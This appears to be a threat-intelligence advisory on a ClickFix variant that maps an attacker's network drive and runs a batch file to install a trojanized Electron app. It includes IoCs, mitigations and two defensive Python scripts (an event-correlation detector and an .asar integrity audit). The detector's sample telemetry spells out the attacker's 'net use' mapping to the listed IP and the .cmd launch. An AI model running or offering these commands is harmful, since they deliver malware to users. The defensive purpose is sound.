Investigating a new Click-fix variant
A new variant of the ClickFix technique has been identified, where attackers convince users to execute malicious commands on their devices through the Win + R shortcut. This variation uses a 'net use' command to map a network drive from an external server, followed by executing a '.cmd' batch file. The script downloads a ZIP archive, unpacks it, and executes a legitimate WorkFlowy application with modified, malicious logic hidden inside an '.asar' archive. The modified application acts as a C2 beacon and a dropper for the final malware payload. The attack bypasses typical detection methods by relying on Electron application bundling to hide the malicious code inside an otherwise legitimate program.
AI Analysis
Technical Summary
This newly identified ClickFix variant represents an evolution in social engineering and malware delivery tactics. The attack begins by tricking users into pressing Win + R and executing a crafted command that uses 'net use' to map a network drive from an attacker-controlled external server. This mapped drive hosts a malicious batch (.cmd) script that, once executed, downloads a ZIP archive containing a modified version of the legitimate WorkFlowy application. WorkFlowy is an Electron-based app, and the attackers have embedded malicious code within its '.asar' archive, a packaging format used by Electron apps. This embedded code functions as a command-and-control (C2) beacon, enabling communication with attacker infrastructure, and also acts as a dropper to deploy the final malware payload onto the victim's system. The use of Electron app bundling and legitimate software helps the malware evade signature-based detection and behavioral monitoring. The attack chain involves multiple stages: social engineering to initiate execution, network drive mapping to access malicious resources, script execution to download and unpack payloads, and finally, execution of the trojanized Electron app. Indicators of compromise include specific file hashes, IP 144.31.165.173, domains such as cloudflare.report and happyglamper.ro, and URLs linked to the attack. Although no active exploits have been reported in the wild, the technique’s reliance on user execution and its stealthy nature pose a significant risk. The attack leverages several MITRE ATT&CK techniques, including T1204.002 (User Execution), T1059 (Command and Scripting Interpreter), T1140 (Deobfuscate/Decode Files or Information), T1041 (Exfiltration Over C2 Channel), and T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder), among others.
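The stages listed above (share mapping, script execution from the share, beaconing to known infrastructure) can be turned into correlation logic over endpoint telemetry. The following Python script is an added example written for this page, not code from Atos, AlienVault or the analysis above: it walks a small set of constructed process-creation, DNS and connection events in a Sysmon-like shape, flags a `net use` mapping to an external host, a `.cmd` launched from that mapped drive shortly afterwards, and any lookup or connection that hits the pulse's domains and IP. The event field names, host names, the `INTERNAL_SUFFIXES` allowlist and the 15-minute correlation window are assumptions; only the domains and IP come from the page.

```python
import ipaddress
import re
from datetime import datetime, timedelta

# Page IoCs (the only values here taken from the pulse); everything else is constructed.
IOC_DOMAINS = {"cloudflare.report", "happyglamper.ro"}
IOC_IPS = {"144.31.165.173"}
# Assumed internal DNS suffixes: shares under these names are treated as trusted.
INTERNAL_SUFFIXES = (".corp.example",)

UNC_HOST_RE = re.compile(r"\\\\([A-Za-z0-9.\-]+)\\")
NET_USE_RE = re.compile(r"\buse\s+(?:([A-Za-z]):\s+)?(\\\\\S+)", re.IGNORECASE)
SCRIPT_RE = re.compile(r"((?:[A-Za-z]:|\\\\)[^\s'\"]*\.cmd)\b", re.IGNORECASE)


def is_external_host(host):
    """A share host is external if it is a public IP, or a dotted DNS name
    outside the internal suffixes (bare NetBIOS names are treated as internal)."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        h = host.lower()
        return "." in h and not h.endswith(INTERNAL_SUFFIXES)


def analyze(events, window=timedelta(minutes=15)):
    """Return (rule, host, detail) alerts for the ClickFix chain described above."""
    alerts = []
    mapped = {}  # (host, "Z:") -> time an external share was mapped to that letter
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, host, kind = datetime.fromisoformat(ev["ts"]), ev["host"], ev["event"]
        if kind == "process_create":
            image = ev["image"].lower().rsplit("\\", 1)[-1]
            cmd = ev["cmdline"]
            if image in ("net.exe", "net1.exe"):
                m = NET_USE_RE.search(cmd)
                if not m:
                    continue
                drive, unc = m.group(1), m.group(2)
                share = UNC_HOST_RE.match(unc)
                if share and is_external_host(share.group(1)):
                    alerts.append(("external_share_mapped", host, unc))
                    if drive:
                        mapped[(host, drive.upper() + ":")] = ts
            elif image == "cmd.exe":
                m = SCRIPT_RE.search(cmd)
                if not m:
                    continue
                path = m.group(1)
                if path.startswith("\\\\"):  # script run straight from a UNC path
                    share = UNC_HOST_RE.match(path)
                    external = bool(share) and is_external_host(share.group(1))
                else:  # script run from a drive letter mapped to an external share recently
                    mapped_at = mapped.get((host, path[:2].upper()))
                    external = mapped_at is not None and ts - mapped_at <= window
                if external:
                    alerts.append(("script_from_external_share", host, path))
        elif kind == "dns":
            q = ev["query"].lower().rstrip(".")
            if any(q == d or q.endswith("." + d) for d in IOC_DOMAINS):
                alerts.append(("ioc_domain", host, q))
        elif kind == "net_conn" and ev["dst_ip"] in IOC_IPS:
            alerts.append(("ioc_ip", host, ev["dst_ip"]))
    return alerts


# Constructed sample telemetry: one infected workstation, one benign logon-script case.
SAMPLE_EVENTS = [
    {"ts": "2026-03-16T10:01:02", "host": "WS-42", "event": "process_create",
     "image": r"C:\Windows\System32\net.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"net use Z: \\144.31.165.173\share /persistent:no"},
    {"ts": "2026-03-16T10:01:04", "host": "WS-42", "event": "process_create",
     "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"cmd.exe /c Z:\setup.cmd"},
    {"ts": "2026-03-16T10:01:09", "host": "WS-42", "event": "dns", "query": "cloudflare.report"},
    {"ts": "2026-03-16T10:01:10", "host": "WS-42", "event": "net_conn", "dst_ip": "144.31.165.173"},
    {"ts": "2026-03-16T10:05:00", "host": "WS-07", "event": "process_create",
     "image": r"C:\Windows\System32\net.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"net use H: \\fs01.corp.example\home"},
    {"ts": "2026-03-16T10:05:01", "host": "WS-07", "event": "process_create",
     "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c H:\logon.cmd"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

The drive-letter correlation is what separates this chain from ordinary logon scripts: the benign WS-07 events map an internal file server and run a `.cmd` from it without producing an alert, while on WS-42 the mapping to a public IP is recorded and the script launched two seconds later from that letter is tied back to it. Feed real events in the same shape (Sysmon event IDs 1, 3 and 22 map directly onto the three kinds) and extend `INTERNAL_SUFFIXES` to your own domains.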
Potential Impact
If successfully executed, this malware variant can lead to unauthorized remote control of infected systems, data exfiltration, and deployment of additional malicious payloads. The use of legitimate software with embedded malicious logic complicates detection and response, potentially allowing attackers to maintain persistence and evade security controls for extended periods. Organizations may face data breaches, intellectual property theft, operational disruption, and reputational damage. The attack requires user interaction, which limits automated spread but increases risk in environments with less security awareness or insufficient endpoint protections. The stealthy nature of the Electron app-based payload and the use of network drive mapping can bypass traditional endpoint detection and network monitoring tools, increasing the likelihood of prolonged undetected compromise. This threat is particularly concerning for organizations relying on Windows environments and those that allow execution of scripts and network drive mappings without strict controls.
Mitigation Recommendations
To mitigate this threat, organizations should implement strict endpoint security policies that restrict execution of scripts and commands via Win + R or other shortcuts, especially those involving network drive mappings. Employ application whitelisting to prevent execution of unauthorized batch files and modified Electron applications. Enhance user awareness training focused on the risks of executing unsolicited commands or scripts, particularly those initiated via social engineering. Monitor and restrict use of 'net use' commands and network drive mappings from untrusted external sources. Deploy advanced endpoint detection and response (EDR) solutions capable of analyzing Electron app behaviors and detecting anomalous '.asar' archive modifications. Regularly audit startup and autostart locations (registry run keys, startup folders) for unauthorized entries. Use network monitoring to detect suspicious communications to known malicious domains and IP addresses such as cloudflare.report and 144.31.165.173. Maintain up-to-date threat intelligence feeds to identify and block indicators of compromise associated with this attack. Finally, restrict user privileges to prevent execution of commands requiring elevated rights and enforce the principle of least privilege.
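The recommendation to detect anomalous '.asar' modifications can be implemented as an integrity audit of the archive an Electron app ships with. The following Python is an added example, not WorkFlowy's, Electron's or the advisory's own code: it parses the asar container (an 8-byte size pickle, a JSON header pickle, then concatenated file data), hashes every packed file, and diffs the result against a manifest taken from a known-good build. The packer exists only to produce a test archive in memory; the sample file names and contents are constructed.

```python
import hashlib
import json
import struct


def pack_asar(files):
    """Build a minimal asar archive in memory (flat file list, no directories).
    Layout: [u32 4][u32 header_size][u32 payload_len][u32 json_len][json][pad][file data...]"""
    header, blob = {"files": {}}, b""
    for name, content in files.items():
        header["files"][name] = {"size": len(content), "offset": str(len(blob))}
        blob += content
    hjson = json.dumps(header).encode()
    pad = (-len(hjson)) % 4  # pickle strings are padded to 4-byte alignment
    header_pickle = struct.pack("<II", 4 + len(hjson) + pad, len(hjson)) + hjson + b"\0" * pad
    return struct.pack("<II", 4, len(header_pickle)) + header_pickle + blob


def read_asar(data):
    """Parse an asar archive and return {path: bytes} for every packed file."""
    _, header_size = struct.unpack_from("<II", data, 0)
    _, json_len = struct.unpack_from("<II", data, 8)
    header = json.loads(data[16:16 + json_len])
    base = 8 + header_size  # file data starts right after the header pickle
    out = {}

    def walk(node, prefix):
        for name, meta in node["files"].items():
            if "files" in meta:  # directory entry
                walk(meta, prefix + name + "/")
            elif not meta.get("unpacked"):  # files kept outside the archive are skipped
                off = base + int(meta["offset"])
                out[prefix + name] = data[off:off + meta["size"]]

    walk(header, "")
    return out


def manifest(files):
    """SHA-256 of every file; capture this once from a known-good build."""
    return {name: hashlib.sha256(content).hexdigest() for name, content in files.items()}


def verify_asar(data, baseline):
    """Compare an archive against the known-good manifest."""
    current = manifest(read_asar(data))
    return {
        "modified": sorted(n for n in baseline if n in current and current[n] != baseline[n]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


# Constructed stand-in for a vendor's app.asar; a real archive is far larger.
GOOD_FILES = {
    "package.json": b'{"name":"example-app","main":"main.js"}',
    "main.js": b"const {app} = require('electron');\napp.whenReady().then(() => {});\n",
}
# The same archive after it was re-packed with altered logic and an extra file.
TAMPERED_FILES = dict(GOOD_FILES)
TAMPERED_FILES["main.js"] = GOOD_FILES["main.js"] + b"require('./loader.js');\n"
TAMPERED_FILES["loader.js"] = b"// placeholder for code the vendor never shipped\n"

if __name__ == "__main__":
    baseline = manifest(GOOD_FILES)
    print(verify_asar(pack_asar(GOOD_FILES), baseline))
    print(verify_asar(pack_asar(TAMPERED_FILES), baseline))
```

In practice, read `app.asar` from the deployed application's resources directory and take the baseline from the vendor's installer on a clean machine; a `modified` entry for the app's main script, or an `added` file that is not in the vendor build, is exactly the kind of change the advisory describes. Electron can also validate its own embedded header hash when the corresponding fuse is enabled at build time, which an out-of-band audit like this complements rather than replaces.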
Affected Countries
United States, Germany, United Kingdom, France, Canada, Australia, Netherlands, Romania
Indicators of Compromise
- hash: 9ee58eb59e337c06429ff3f0afd0ee6886b0644ddd4531305b269e97ad2b8d42
- hash: a390fe045f50a0697b14160132dfa124c7f92d85c18fba07df351c2fcfc11063
- hash: dc95f7c7fb98ec30d3cb03963865a11d1b7b696e34f163b8de45f828b62ec829
- ip: 144.31.165.173
- url: http://cloudflare.report/forever/e/
- url: https://cloudflare.report/forever/e/
- domain: cloudflare.report
- domain: happyglamper.ro
Technical Details
- Author: AlienVault
- TLP: white
- References: https://atos.net/en/lp/cybershield/investigating-a-new-click-fix-variant
- Adversary: none
- Pulse Id: 69b7db3dcc28a49fbcbad5df
- Threat Score: none
Threat ID: 69b7e3e19d4df45183505ada
Added to database: 3/16/2026, 11:05:05 AM
Last enriched: 3/16/2026, 11:21:18 AM
Last updated: 3/16/2026, 9:37:59 PM